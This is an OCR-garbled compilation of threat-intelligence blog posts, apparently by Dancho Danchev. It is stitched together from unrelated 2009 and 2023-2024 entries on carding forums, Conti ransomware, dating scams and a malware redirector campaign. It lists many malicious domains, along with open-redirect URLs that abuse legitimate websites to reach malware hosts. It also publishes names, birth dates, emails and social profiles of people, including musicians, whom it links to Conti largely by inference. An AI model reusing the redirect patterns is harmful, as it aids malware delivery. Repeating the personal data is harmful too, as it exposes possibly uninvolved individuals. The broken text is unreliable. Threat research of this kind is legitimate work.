TO OBTAIN A FREE COPY! 


The following is a recently obtained compilation of currently active cybercrime-friendly forum 
communities. 


Sample cybercrime-friendly forum communities include: 
hxxp://www.darkteam.se/ 
hxxp://crdforum.cc/ 
hxxp://legitcarders.ws/ 
hxxp://cardingworld.ru 
hxxp://carders. biz/ 
hxxp://carding.cm/ 
hxxp://cardmafia.cc/ 
hxxp://cardingforum.cx/ 
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hxxp://carder.market/ 
hxxp://www.russiancarders.se/ 
hxxp://darkwebmafias.net/ 
hxxp://legendzforum.com/ 
hxxp://procrax.cx/ 


1. https://blogger . googleusercontent . com/img/b/R29VZ2x1/AVvXsEj 6u0-qe05600dcX0Dfm0y509Z00g0t jeSrvCX7eHLiikR60 


7bJmwT-OKQRn71dLGw_wt jOxV4CVh1lexBwmjGFfYz1xdnmUKKnVuP 


19.12.8 Emennet Pasargad (2023-12-02 13:18) 


[1] 


The following are domains and personally identifiable email address accounts belonging to 
Iran’s Emennet Pasargad also known as Eeleyanet Gostar and Eeleyanet Gostar. 


Sample domains: 
eeleyanet.com 
eeleyanet.ir 


Sample personally identifiable email address accounts: 
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sidafin@mihanmail.ir 
amirhaghighi2014@yahoo.com 
safary.mansoor@gmail.com 
Rahimi@Live.com 
faranakbehjati@yahoo.com 


h.boloukat@gmail.com 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgaM7d2z15c JqO-5WxyXxx3pgAEdNc4bc07ykdnWC1dKC79 
rXcQz2mMmhvO4UL4KEh38Uf tzkf£V2d7S__LqsOTj JHwO5rLxViR 


19.12.9 The Conti Ransomware Gang’s OSINT Artifacts (2023-12-02 16:58) 


[1] 


The following is a set of OSINT artifacts courtesy of the Conti Ransomware gang. 


hxxp://cc2-btc.cc 

hxxp://dyncheck.com 

hxxp://luxchecker.pw 

hxxp://major.ms 

hxxp://securecall.club 

hxxp://securecall.top 

hxxp://checkzilla.io 

Including the following two XMPP/Jabber accounts: 
mcduckgroup@exploit.im 

uvoice@xmpp.jp 


1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgthj 1YTW9Z-3LSugCzVF jASk91i6DkDC86FuF9NR7ogVG1 
40u0ZM1wV-penFn_RmPeDf4yrMx50KMiewt 36Knga2Jjo8mEjLpqot 
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19.12.10 The Most Innovative Cyber Security Leader to Watch in 2023 
(2023-12-15 19:01) 


Dear blog readers, 
| did it. Check out the article [2]here. 
Related photos: 


[3] 
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For the time being, the following dating scam domains are responding to the same IP: 
healthe-lovesite .com - Email: potenciallio@safe-mail.net 

love-isaclick .com - Email: potenciallio@safe-mail.net 

love-is-special .com - Email: potenciallio@safe-mail.net 

only-loveall .com - Email: potenciallio@safe-mail.net 

and-i-loveyoutoo .com - Email: potenciallio@safe-mail.net 

andiloveyoutoo .com - Email: menorstl10@yahoo.com 


romantic-love-forever .com - Email: potenciallio@safe-mail.net 


Wekome to Ukrainian marriage agency 


Wha 


wy @ 
= 1a8 ae Sete gre, £ 
—_ ow ie ¢% “K& 
hot Passmard? ‘ , ) k 
New ladi « 
— “Ne _ elcome! ~ 
In gallery a * 
Bol 
3 years ot 
Welcome to Ukrainian marriage agency! 
2a yeors old Our congratulations! 
You finally found your LOVE! 
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In Pursuit of 
Cyberjusticé 


i 


Panchev 


Navigating the World of CyBerthreats 


[4] 
28453 


28454 


clo™ 


The certificate is awarded to 


by ClOLook in recognition as one of 


The Most Innovative Cyber Security 
Leaders to Watch in 2023 


[5] 


77 , y 


Manche, 


1. https: //blogger .googleusercontent .com/img/a/AVvXsEhXRbfSf£RB_QXONLwVjOtLHMeHcd7tZrpg7pzrBXsBhS JEjo1PMBsa486 
2. https://ciolook.com/in-pursuit-of-cyber just ice-dancho-danchev-navigating-the-world-of-cyberthreats/ 

3. https://blogger .googleusercontent .com/img/a/AVvXsEgszGrgAU41QGEHAz13k13y 1NuzABAozI Iw4x1RW1docOJYVWOHN5ge64 
https: //blogger .googleusercontent .com/img/a/AVvXsEgiCqUAr053yZ- fnGUXfhr10mfnkOmnjLU6VTths7X0uG1905T922a68H 
5. 


> 
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19.12.11 Looking for a Research Sponsorship (2023-12-15 19:02) 


Dear blog readers, 
Are you interested in sponsoring my research on my way to grab a new laptop for the holidays? 


Drop me a line at dancho.danchev@hush.com to discuss and I'll do my best to deliver the 
results that we agree upon. 


1. https: //blogger . googleusercontent. com/img/a/AVvXsEgUXU6Gv2XgNt11k17X jUojGdEok8IoIdchRFXp68qdHG20vwY_MJo8d 


oEC3 JO903r8Uu-zZ08ws-LadJN4QQb_PzooorudxXbMcuf3jOsRZha2 


19.12.12 Offering my Laptop for Memorabilia Purposes (2023-12-15 19:02) 


[1] 
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Dear blog readers, 


Who wants to acquire and purchase my laptop 2015-2023 for memorabilia purposes and pos- 
sibly somehow use it preserve or display it somewhere? 


Related photo: 


[2] 
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Re . ~-by Danctho Oanchey : a 
Mts Hadanchex blogspot. coar = 
Enaits: gancho.daachev@hush.com. 


¥. 
=—_— 
S 


Drop me a line at dancho.danchev@hush.com 


1. iveps:/ ologger.googleuser content con/ing/a/AVWaig_THSV_ 2, V-TOSghV IW08q- DrSENIND ixGdeT3#KVeaKOBLOHOR] 
2. hteps:/ blogger. googleusercontent.con/ing/a/AVviaEg. SMIFGAMTHZOSqEOdh jwznVeDvieDYysTsH3vGVGX1 CROWERDIR 


19.12.13 Upcoming Webinar Participation (2023-12-15 19:02) 


[1] 
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CONGUEA TOUR RISK 


A AE PARIS GpRaror 


The evolving threat landscape and the future of cybercrime. 


12 December 2023 Dancho Danchev 
18:30 (Paris) Threat Intelligence Pioneer 
Nation-state cybercrime researcher 

HOSTED BY 
Poe . Ronan Mouchoux 
y y yee rays Threat Intelligence Specialist 
Co-Director of the Risk Chair Cofounder of XRATOR 


Dear blog readers, 
Check out the link [2]here. 
1. https: //blogger .googleusercontent .com/img/a/AVvXsEjWuPOJvNGz2brUfWL1OBK6zBZoF cHgktf£GUet tcNC26tSTrLP1L9eLn 


i9FPmOysfhRdFylsm00tLhHew- ZVfTB20GTzJairtIBCm62M276xXJO 
2. https://www.linkedin.com/events/theevolvingthreatlandscapeandth7 13881 1320363036672 


19.12.14 Who’s Pushing All The "Fake Updates" Malicious Software Using Redirec- 
tors and Traffic Distribution and Redirection Systems and Tools Domains? 
(2023-12-28 13:03) 


[1] 
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You're opening a new wed page 9 
anpisw2Zv_biggerfun.org that 6 not part of NP 


Continue or Cancel 
i) 


I’ve recently observed an increase in compromised or exploited to be precise in the context 
of abusing unfixed web application flaws such as for instance redirection notifications on high- 
traffic and high-profile Web sites where the ultimate goal would be to push traffic distribution 
and traffic management rogue domains part of a URL redirection chain where the ultimate 
goal would be to utilize both legitimate high-traffic and high-profile Web sites including purely 
malicious Web sites for the purpose of dropping malicious software on the targeted hosts. 


The surprising part? The primary and entire portfolio of these traffic redirection and traffic 
management domain are parked on 193.106.175.18 - AS50465 - IQHost Ltd where one of the 
bigger domain farms is parked at hxxp://biggerfun.org. 


[2] 
28460 


—<——— surelytheme.org 
freethegirlinitiative.org oan 


Sample misconfigured high-traffic and high-profile Web sites that allow redirections potentially 
bypassing reputation filters include: 


hxxp://afmonline.org/?URL=hxxp://khTrnBOWVS8. biggerfun.org/khTrnBOWV8/ 
hxxp://whiskyparts.co/?7URL=m88Z2iiER. biggerfun.org/M88Z2iiER/ 
hxxp://hardemancounty.org/?URL=http %3A %2F %2F1FXddDHkYN.biggerfun.org/1F XddDHkKYN/ 
hxxp://bukkit.org/proxy.php?link=hxxp://uToqSuwC. biggerfun.org/uToqSuwC/ 
hxxp://www.centralsynagogue.org/?URL=hxxp://NjNr8Mkm.biggerfun.org/NjNr8Mkm / 
hxxp://board-en.piratestorm.com/proxy.php?link=http %3A %2F %2Fnpn8KwBr.biggerfun.org/npn8Kv 
hxxp://boards.theforce.net/proxy.php?link=hxxp://WihYqBBuvj.biggerfun.org/W ihYqBBuvj/ 
hxxp://www.cutrite.com.au/?URL=hxxp://9MVRIHjF.biggerfun.org/9MVRIHjF/ 


[3] 
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Sample traffic redirection and traffic management domains involved in the campaign include: 
hxxp://surelytheme.org 

hxxp://bluegaslamp.org 

hxxp://throatpills.org 

hxxp://draggedline.org 

hxxp://machinetext.org 

hxxp://throatpills.org 


hxxp://climedballon.org 


[4] 


Sample related domains known to have been involved in the campaign and are currently 
parked at 193.106.175.18 - AS50465 - IQHost Ltd include: 


hxxp://jsqur.com 

hxxp://libertader.org 
hxxp://mrbotn.jsqur.com 
hxxp://www.catsndogz.org 
hxxp://user179.jsqur.com 
hxxp://marcusdesigninc.jsqur.com 
hxxp://nuvoleparlanti.jsqur.com 
hxxp://fserver.jsqur.com 
hxxp://download.www.windowlight.org 


hxxp://mtf-misawa.jsqur.com 
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love-youloves .com - Email: potenciallio@safe-mail.net 
love-galaxys .com - Email: potenciallio@safe-mail.net 
love-formeandyou .com - Email: potenciallio@safe-mail.net 
ifound-thelove .net - Email: potenciallio@safe-mail.net 
findloveon .net - Email: wersers@yahoo.com 


love-isexcellent .net - Email: potenciallio@safe-mail.net 


Could it get even more malicious and fraudulent than that? Appreciate my thetoric. The same 
email (potenciallio@safe-mail.net) that was used to register the dating scam domains was 
also used to register exploit serving domains at 195.88.190.247, [62]participate in phishing 
Campaigns, and register a [63]money mule recruitment site for the non-existent [64]Allied 
Insurance LLC. (Allied Group, Inc.). 


Now that’s a multi-tasking underground enterprise, isn’t it? The ISPs have been notified, 
domains suspension is pending. 


Related posts: 

[65]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[66]New Koobface campaign spoofs Adobe’s Flash updater 
[67]Social engineering tactics of the Koobface botnet 
[68]Koobface Botnet Dissected in a TrendMicro Report 
[69]Koobface Botnet’s Scareware Business Model 
[70]Movement on the Koobface Front - Part Two 
[71]Movement on the Koobface Front 

[72]Koobface - Come Out, Come Out, Wherever You Are 
[73]Dissecting Koobface Worm’s Twitter Campaign 


[74]Dissecting the Koobface Worm’s December Campaign 
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hxxp://cdn.jsqur.com 
hxxp://dashtiha.jsqur.com 
hxxp://vitkutin.jsqur.com 
hxxp://permisdeconduire.jsqur.com 
hxxp://olympics.jsqur.com 
hxxp://emv1.vibedroom.org 
hxxp://melpar-emh1.jsqur.com 
hxxp://u.admin.backendjs.org 
hxxp://billtieleman.jsqur.com 
hxxp://descarte.jsqur.com 
hxxp://4m.jsqur.com 
hxxp://sn007.jsqur.com 
hxxp://win24.jsqur.com 
hxxp://web3449.jsqur.com 
hxxp://cgxdave.jsqur.com 
hxxp://cassandre.jsqur.com 
hxxp://deeptrickday.org 
hxxp://xxxl80.jsqur.com 
hxxp://91.jsqur.com 
hxxp://castlerea.jsqur.com 
hxxp://dkline.jsqur.com 
hxxp://daws-512.jsqur.com 
hxxp://ufl.jsqur.com 
hxxp://eggert.jsqur.com 
hxxp://apps.jqueryj.com 
hxxp://frightysever.org 
hxxp://beal.jsqur.com 
hxxp://survey.backendjs.org 
hxxp://best-funny-quotes.jsqur.com 
hxxp://jeanm.jsqur.com 
hxxp://forms.admin.backendjs.org 
hxxp://comtenc.jsqur.com 
hxxp://dannyfilm.jsqur.com 
hxxp://office.backendjs.org 
hxxp://jqueryj.com 
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hxxp://longtail.jsqur.com 
hxxp://web6201.jsqur.com 
hxxp://hoytek-gw4.jsqur.com 
hxxp://gazeta.jsqur.com 
hxxp://www.treegreeny.org 
hxxp://cpfm.jsqur.com 
hxxp://asims-rdck1.jsqur.com 
hxxp://indiajobscircle.jsqur.com 
hxxp://babbar.jsqur.com 
hxxp://gorki.jsqur.com 
hxxp://gmailblog.jsqur.com 
hxxp://dvan.jsqur.com 
hxxp://carpinteros-aluminio.jsqur.com 
hxxp://web18332.jsqur.com 
hxxp://wallah.jsqur.com 
hxxp://si.jsqur.com 
hxxp://shems.jsqur.com 
hxxp://vigen.jsqur.com 
hxxp://sws.jsqur.com 
hxxp://routetest.jsqur.com 
hxxp://account.admin.backendjs.org 
hxxp://secure-ite2-origin.jsqur.com 
hxxp://mdm.backendjs.org 
hxxp:// _dmarc.jqueryns.com 
hxxp://mdm.backendjs.org 
hxxp://mntc.jsqur.com 
hxxp://powerful.jsqur.com 
hxxp://whitney.jsqur.com 
hxxp://stream.jsqur.com 
hxxp://uhost.jsqur.com 
hxxp://unix3.jsqur.com 
hxxp://www.florida.jsqur.com 
hxxp://jkelley.jsqur.com 
hxxp://derby.jsqur.com 
hxxp://currier.jsqur.com 
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hxxp://wp.admin.backendjs.org 


hxxp://frente-a-camaras.jsqur.com 


hxxp://facman.jsqur.com 
hxxp://b10.jsqur.com 
hxxp://arehn.jsqur.com 
hxxp://cprat.jsqur.com 
hxxp://hpermsp.jsqur.com 
hxxp://ksia.jsqur.com 
hxxp://jhansen.jsqur.com 
hxxp://biggerfun.org 
hxxp://kodakr.jsqur.com 
hxxp://samfox.jsqur.com 
hxxp://apps.jsqur.com 
hxxp://passe.jsqur.com 
hxxp://walkman.jsqur.com 
hxxp://stovallscx.jsqur.com 
hxxp://antivir.jsqur.com 
hxxp://link2-me.jsqur.com 
hxxp://xx9.jsqur.com 
hxxp://quine.jsqur.com 
hxxp://v.circuspride.org 
hxxp://cn.circuspride.org 
hxxp://x.circuspride.org 
hxxp://pay.circuspride.org 
hxxp://ssl.circuspride.org 
hxxp://physiology.jsqur.com 
hxxp://mytabletpcuk.jsqur.com 
hxxp://gdsz.jsqur.com 
hxxp://daws-43-5.jsqur.com 
hxxp://cfg.circuspride.org 
hxxp://ip90.jsqur.com 
hxxp://oily.jsqur.com 
hxxp://jqueryh.org 
hxxp://tamarack.jsqur.com 


hxxp://macgo.jsqur.com 
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hxxp://interlock.jsqur.com 
hxxp://cmu-cc-vma.jsqur.com 
hxxp://daws91-3.jsqur.com 
hxxp://norman.jsqur.com 
hxxp://www.16.jsqur.com 
hxxp://web3933.jsqur.com 
hxxp://mta-sts.bluegaslamp.org 
hxxp://212.jsqur.com 
hxxp://dooly.jsqur.com 
hxxp://www.bigbricks.org 
hxxp://machinetext.org 
hxxp://kb.windowlight.org 
hxxp://catsndogz.org 
hxxp://whitedrill.org 
hxxp://www.neworderspath.org 
hxxp://jqueryns.com 
hxxp://sorteios-e-promocoes.jsqur.com 
hxxp://web5422.jsqur.com 
hxxp://ivtortypqfyi.greedyclowns.org 
hxxp://ivtorlypqfyi.greedyclowns.org 
hxxp://ivladimir.surelytheme.org 
hxxp://ivodimir.surelytheme.org 
hxxp://liorida.surelytheme.org 
hxxp://rota-sts.climedballon.org 
hxxp://climedballon.org 
hxxp://treegreeny.org 
hxxp://daddygarages.org 
hxxp://emperorplan.org 


[5] 
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hxxp://bigbricks.org 
hxxp://greedyclowns.org 
hxxp://vibedroom.org 
hxxp://backendjs.org 
hxxp://dailytickyclock.org 
hxxp://neworderspath.org 
hxxp://devcodejs.org 
hxxp://cancelledfirestarter.org 
hxxp://greedyfines.org 
hxxp://limeerror.org 
hxxp://bluegaslamp.org 
hxxp://throatpills.org 
hxxp://drilledgas.org 
hxxp://draggedline.org 
hxxp://windowlight.org 
hxxp://sevenpunches.org 
hxxp://circuspride.org 
hxxp://linedgreen.org 
hxxp://surelytheme.org 
hxxp://vivaldi-ed.group 
hxxp://cashapp-renewal.com 
hxxp://ing-update.info 
hxxp://bankid-app.net 
hxxp://commonwealth-renewal.com 
hxxp://transfer-management.com 
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hxxp://banko-atnaujinimas.com 
hxxp://s-identity-verwalten.com 
hxxp://bigfat.shop 
hxxp://fomzerapoze.shop 
hxxp://aremonuza.shop 
hxxp://hanmozapre.shop 
hxxp://bamizorapa.shop 
hxxp://yazevora.com 
hxxp://ipko-aktualizacja.com 
hxxp://halifax.signin-helpdesk.com 
hxxp://signin-helpdesk.com 
hxxp://hailfax.signin-helpdesk.com 
hxxp://online-helpdesk-portal.com 
hxxp://santander.online-helpdesk-portal.com 
hxxp://jquerypure.com 
hxxp://de-system-913580.xyz 
hxxp://targo.de-system-913580.xyz 
hxxp://be-systeem-8510598.xyz 
hxxp://ns1.putinkremel.su 
hxxp://notudhost.com.ru 
hxxp://trsew.ru 
hxxp://fashmodsite.uno 
hxxp://nnnten.ru 
hxxp://tenhost.com.ru 
hxxp://au-08.top 
hxxp://jutralalali.xyz 
hxxp://gilirges.ru 
hxxp://www.gilirges.ru 
hxxp://ftp.gilirges.ru 
hxxp://www.tanmhopisj.xyz 
hxxp://tanmhopisj.xyz 
hxxp://dev.urbangroup.ru 
hxxp://equalizer.dev.urbangroup.ru 
hxxp://vk.equalizer.dev.urbangroup.ru 
hxxp://partners.urbangroup.ru 
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hxxp://realty-2.urbangroup.ru 
hxxp://ivakino.urbangroup.ru 
hxxp://gtry.ru 
hxxp://serferio.ru 
hxxp://forum-laikovo.urbangroup.ru 
hxxp://urbangroup.ru 
hxxp://myrussianland.ru 
hxxp://gb2nevinsk.ru 
hxxp://englishbiblioteka.ru 
hxxp://aleana63.ru 
hxxp://aptekaplus23.ru 
hxxp://chulkovo.info 
hxxp://mchedlidze.ru 
hxxp://stroytransm.ru 
hxxp://flystore.ru 
hxxp://kino-pirat.net 
hxxp://2sunss.com 
hxxp://posadisvoederevo.ru 
hxxp://testcosmetic.com 
hxxp://vkino.me 
hxxp://v1080hd.com 
hxxp://r-style.com 
hxxp://science-techno.ru 
hxxp://kinotuz.ru 
hxxp://901901.ru 
hxxp://ludota.ru 
hxxp://maindoor.ru 
hxxp://kinoxaba.ru 
hxxp://youcanexcel.ru 
hxxp://gidonlinehd.ru 
hxxp://kinoggo.ru 
hxxp://L00pdf.net 
hxxp://kinoext.ru 
hxxp://www.mreporter.ru 


hxxp://magobr.ru 
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hxxp://Ig-soft.ru 
hxxp://anapa-new.ru 
hxxp://fat-man.ru 
hxxp://gracio.ru 
hxxp://ikd.ru 
hxxp://poseidonboat.ru 
hxxp://vetla.ru 
hxxp://74dom.ru 
hxxp://kabrik-servis.ru 
hxxp://tehnopanda.ru 
hxxp://creativejournal.ru 
hxxp://ufamenu.ru 
hxxp://idf.ru 
hxxp://sporthit.ru 
hxxp://injgeo.ru 
hxxp://asbank.ru 
hxxp://wood-lux.ru 
hxxp://Ibf51b14.justinstalledpanel.com 


I'll continue monitoring the campaign and will post updates as soon as new developments take 
place. 


1. https://blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEgs5d1S7E-Ce7- ilprKLPNDpH_Jrcnq5zLdi2f4RVo_6tn4j 


2. 
7VJF2IYv1iBzTAys_ECpoh6HL7sd2eK29H1eN8zSNYGYEAcjd3w5Ad 
5. 
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2024 


20.1 January 


20.1.1 Who’s Behind the Conti Ransomware Gang? - Part Two (2024-01-03 16:35) 


[1] 


FOREIGN GOVERNMENT-LINKED MALICIOUS CYBER ACTIVITY 
TARGETING U.S. CRITICAL INFRASTRUCTURE 


If you have information that ties hacking groups 
such as Conti, TrickBot, Wizard Spider; the 
hackers known as “Tramp,” “Dandis,” 
“Professor,” “Reshaev,” or “Target”; or any 


> 
> 
malware or ransomware to a foreign wus: *PROFESSOR” Jaus “RESHAEV" 


government targeting U.S. critical aN 
infrastructure, you may be eligible for a reward. s=_U.S. GOVERNMENT PHOTO 


m IS THIS THE CONTI 
Send your information to RFJ via our mee ASSOCIATE KNOWN AS 


Tor-based tip line below. AUAS:“TRAMP” | auas:“DANDIS” "TARGET"? 


Tor Link:heS5dybnt7sr6cm32xt77pazmtm65flay6irivtflrugfcSep7eiodiad.onion oV 


fu 

“U.S. Department of State @ +1-202-702-7843 ; 

"3 Diplomatic Security Service 
~~ Rewards for Justice @RFJ_USA 


In a series of blog posts | exposed the "[2]The Top Management of the Conti Ransomware 
Group’s Fashion and Charity Brands" including "[3]Who’s Behind the Conti Ransomware 
Gang" where | also offered an in-depth peek inside "[4]The Conti Ransomware Gang and 
the Trickbot Cybercrime Enterprise XMPP’s and Jabber Account IDs" where | also successfully 
applied for the Rewards for Justice program "[5]Applying for the Rewards for Justice on the 
Conti Ransomware Gang Program" where | also published never-published or discussed before 
"[6]New Images Courtesy of the Conti Ransomware Gang" including my Rewards for Justice 
Conti Ransomware Gang research compilation "[7]Dancho Danchev’s Rewards for Justice 
Conti Ransomware Gang Research and Analysis Compilation" which you can grab from [8]here 
including my first Twitter Space on how | tracked down the Conti Ransomware Gang "[9]My 
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First Twitter Space on How | Tracked Down The Conti Ransomware Gang Using Real-Time 
OSINT" including to expose "[10]Exposing Bentley and Liam From The Conti/Trickbot Malware 
Gang" including to publish never-published or discussed before Conti Ransomware Gang 
videos and images courtesy of the "[11]The Conti Ransomware Gang" including to publish 
an additional set of never-published or released videos courtesy of the Conti Ransomware 
Gang "[12]The Conti Ransomware Gang - Videos - Part Two" including to elaborate on some 
of my research in my "[13]Rewards for Justice - Dancho Danchev" including to publish an 
additional set of "[14]The Conti Ransomware Gang’s OSINT Artifacts" including to also provide 
"T15JA Compilation of Conti Ransomware Gang BitCoin Transaction IDs - An OSINT Analysis" 
including "[16]A Compilation of Known Conti Ransomware Malicious Domains - An OSINT 
Analysis" including "[17]A Compilation of Known Conti Ransomware Themed Malicious and 
Fraudulent MD5s - An OSINT Analysis" including "[18]Exposing the Fashion Brands of the Conti 
Ransomware Group" including "[19]Exposing the Trickbot Malware Gang - An OSINT Analysis" 
including "[20]Exposing the Conti Ransomware Gang - An OSINT Analysis" including "[21]A 
Compilation of Known Conti Ransomware Gang Malicious Executable Download Locations - An 
OSINT Analysis" including "[22]Exposing the Conti Ransomware Gang - An OSINT Analysis" 
including "[23]Rewards for Justice - Dancho Danchev" including "[24]How to Take Down the 
Conti Ransomware Gang - A Practical And Relevant Case Study on Taking Down Cybercriminal 
Infrastructure - A Practical Example". 


In this post I’ll do a last round of elaboration into all the research efforts I’ve been putting into 
identifying core members of the Conti Ransomware Gang using their recently leaked internal 
communication publicly including to use exclusively OSINT for the purpose of successfully iden- 
tifying key and core members of what appears to be a diversified cybercrime gang that has 
a pretty interesting way of distributing their fraudulently obtained income in the context of 
sponsoring and participating in fashion shows and other educational and music sponsorship 
efforts and campaigns on the Russian market supposedly using the stolen income that they’ve 
obtained using their ransomware tactics and techniques. 


What! came up was the following a private teaching school a rap and hip-hop music label where 
we got some of the core Conti Ransomware Gang members doing their advertising creative 
and brochures next to doing their hardcore "upcoming" ransomware brand releases including 
several fashion and clothing brands where we once again have core members of the Conti 
Ransomware Gang doing their advertising and brochure creative. 


The primary goal behind this post and analysis would be to elaborate as to the diverse nature 
of the members of the Conti Ransomware Gang in the context of having them involved in 
fashion music and teaching schools business and charitable initiatives in Russia supposedly 
using the stolen income which they obtained using their ransomware operation online. 


It’s also worth pointing out that this entire analysis including the OSINT analysis and the OSINT 
research and enrichment analysis is entirely based on the Conti Ransomware Gang’s internal 
leaked communication and is done exclusively by me with some quite positive and confirmed 
results already. 


[25] 
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[75]Dissecting the Latest Koobface Facebook Campaign 


[76]The Koobface Gang Mixing Social Engineering Vectors 


This post has been reproduced from [77]Dancho Danchev’s blog. 
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20. http: //ddanchev. blogspot .com/2009/10/koobface-botnet-dissected-in-trendmicro.htm 
. http: //blogs.zdnet .com/security/?p=4549 
22. http://ddanchev. blogspot .com/2009/09/ukrainian-fan-club-features.htm 
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27. http://ddanchev. blogspot .com/2009/05/dating-spam- campaign-promotes-bogus. htm 


28. http: //ddanchev. blogspot .com/2009/06/dating-spam- campaign-promotes-bogus. htm 


. http: //ddanchev. blogspot . com/2009/05/inside-money- laundering-groups- spamming. htm. 
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Sample Conti Ransomware Gang image obtained using public sources based on the gang’s 
internal leaked communication for a cover of a Russian Rap and Hip-Hop Artist and his 
album "Personality" apparently produced by the Conti Ransomware Gang’s team members 
responsible for the advertising creative development for the gang 


Based on my research and analysis the photo obtained using public sources based on the 
gang’s internal leaked communication for a cover of a Russian Rap and Hip-Hop Artist and his 
album "Personality" belongs to the Russian rap and hip-hop artist known as Linkvill where we 
have members of the Conti Ransomware Gang producing their logos and advertising creative 
part of their portfolio. 


Personally identifiable information for Evgeny Samsonov also known as Linkvill: 


hxxp://vk.com/eugene _linkvill 
hxxp://vk.com/artist/linkvill 
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hxxp://vk.com/linkvill _poetry 
hxxp://www. youtube.com/channel/UC9fVu7UVgxBaCRz7RJD7DeQ 


Sample personal photos of Evgeny Samsonov also known as Linkvill: 


[26] 


[27] 
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31. http: //www.virustotal.com/analisis/6795e5339a2f c174752b39231d87f c6fad525d9beac 2f81256c5e1aaa845aa09- 12579 
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34. http://ddanchev. blogspot . com/2008/09/estdomains-and-intercage-vs-cybercrime.htm 

35. http://whois.domaintools.com/212.117.174.19 

36. http://whois.domaintools.com/91.212.226.15 

37. http://ddanchev. blogspot . com/2009/08/us-federal-forms-blackhat-seo-themed. htm 
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Contacts 


Evgeny Samsonov 
rOnoc/CTUXH 
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It also appears that Evgeny Samsonov also known as Linkvill whose album cover "Personality" 
was obtained using public sources and appears to be produced by members of the Conti 
Ransomware Gang who are responsible for creating the gang’s advertising creative is also 
part of the Plastika Sound Boutique Ekaterinburg where we also have a second image courtesy 
of members of the Conti Ransomware Gang mentioning the Plastika music label. 


[49] 


Sample personally identifiable information for Plastika Sound Boutique Ekaterinburg: 


hxxp://vk.com/plastika.space 
hxxp://plastika.space 
Address: ynuua Kuposa, 9, EkatepuxH6ypr 


Part of Plastika Sound Boutique Ekaterinburg are: 


- Nikita Zharinov - born on 10th of January 2002 
- Ice Costa - hxxp://vk.com/icecosta 
- Alexey Plyushkin - born on 11th of April 1994 
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5.11.5 Keeping Money Mule Recruiters on a Short Leash (2009-11-16 23:09) 


Cronos Group Inc J ‘3 | 
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© Contacts 


10/04/2009 - ehay Watch 
Hall_com Bobster 
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Marketing 


The money mule recruitment syndicate exposed in a previous post ([1]Standardizing the 
Money Mule Recruitment Process), continues introducing new domains and re-branding the 
de-facto recruitment templates for a huge percentage of the currently active [2]money mule 


2852 


It gets even more interesting when we research a second image courtesy of the Conti Ran- 
somware Gang which was once again obtained from their recently leaked internal communica- 
tion. 


[52] 
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Sample Conti Ransomware Gang image obtained using public sources 

based on the gang’s internal leaked communication for a cover of a 

Russian Rap and Hip-Hop Artist Ice Costa apparently 

produced by the Conti Ransomware Gang’s team members responsible for the 
advertising creative development for the gang 


The image appears to be a second album cover once again produced by team members of 
the Conti Ransomware Gang responsible for advertising logos and advertising creative devel- 
opment this time by Ice Costa who is also a Russian rap and hip-hop artist who is also part of 
the Plastika Sound Boutique Ekaterinburg. 


Sample photos of Ice Costa  (hxxp://www.youtube.com/channel/UCJQmq6U _ - 
IEYIDnrNSOzZC6dQ): 


[53] 
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PARENTAL 


ADVISORY 


EXPLICIT CONTENT 


The original Ice Costa album cover which is greatly similar to the one produced by members 
of the Conti Ransomware Gang obtained using OSINT 
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[58] 


8 yepBen (Prod. by ICE COSTA) - IuunKsunn - Amtu 
8 yepBen (Prod. by ICE COSTA) 


© 2022 PLASTIKA 
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Sample photos of Nikita Zharinov who is among the original founders of the Plastika Sound 
Boutique Ekaterinburg: 


[61] 
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recruitment scams. 


Ironically, both the syndicate and its competition in the face of boutique money mule re- 
cruitment operations aiming to self-service the cybercriminal - he doesn’t want to share stolen 
revenue with a third-party service provider - behind them, are using the copywriting and 
online brand management services courtesy of a single vendor. 


It’s time to expose the complete domains portfolio of one of their biggest customers, in- 
cluding both domains introduced since the middle of the summer, 2009, as well as the most 
recent ones, with all of them using/having used the services of [3]AS:38356. 


ffte COS¢0-Grousti com 
Maigt-groepee cn . \ 
\ 
A 
it purtan-growpco cn ) 
(Tt purRan-groupine com 
moc regency groupmet cc 2 222.358.137.234 Lge 222.35.137.025 ——thege A5393% 
a 
IT Summer -growpine Cm 
ire barsgroupenain cn 
ns] dutretybeath cc 
NS) Meviackends cn 
purhan-growece cn 
puttan-greupinc com 
redeye groupes com 


regercy groupnet cc 


fengo-groupmain com 
Sick groupmanm cn 
SutreTet-growping on 


ransprowpmain.cn 


Parked at [4]222.35.137.234; [5]222.35.137.235; [6]222.35.137.236; [7]222.35.137.237; 
[8]222.35.137.238 as of Monday, November 18 are the following money mule recruitment 
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Sample photos of Alexey Plyushkin who is among the original founders of the Plastika Sound 
Boutique Ekaterinburg: 
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65) ICE COSTA 
“ 19 Mar 2021 at 4:02 pm 


@ REC PLASTIKA 
“+ COVER Anexceit Ku6aHos 


..He Bugen go6pa unn 3na, A He 3Halo OTBET 
A gonuBalo AbIM MONOKOM Ha O6en 


PARENTAL 


ADVISORY 


EXPLICIT CONTENT 


It appears that based on my OSINT analysis Alexey Plyushkin is the author of the original 
cover for Ice Costa’s album which can be also found in Conti Ransomware Gang’s internal 
leaked communication which means that he supposedly knows the actual team member of 
the Conti Ransomware gang that produced the advertising creative who also produced Evgeny 


Samsonov’s (Linkvill) album cover. 


Next we got three related images once again courtesy of the Conti Ransomware Gang’s 
internal leaked communication this time for "Global School" teaching enterprise and for the 


Youla Land dance lessons school in Russia. 
Sample photos include: 
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BEST LESSON 
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Sample personally identifiable information: 


hxxp://school-global.ru 


hxxp://youladance.ru 


Sample photos: 
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® ans BCcex BO3pacTosB 
® noproTrosKa kK Ef3, OFS 
®@ 3aHATHMA C HOCHTeNneM 


[71] 


wnAMM ny Tenn en! Pacnucanve Marasun Kontaxto! 
yt Yh Ancunnnwnnt —Npenogasa Uerbi oO 


Xopeorpaduyeckan 
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JanucaTeca 


Next we’ve got yet another photo of team members of the Conti Ransomware Gang once 
again based on their internal leaked communication mentioning [72]Morenehost which is a 


well known bulletproof hosting provider. 
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Sample personally identifiable information: 


Teneqmou: +373 775 96666 

E-mail: info@morene.host 

Skype: morene.host 

Jabber: morene@jabber.morene.host 
ICQ: 700812649 / 702647156 
Telegram: @hostmorene 

Viber: +373 775 96666 

WhatsApp: +373 775 96666 
OHNanH-yaT: https://morene.host 


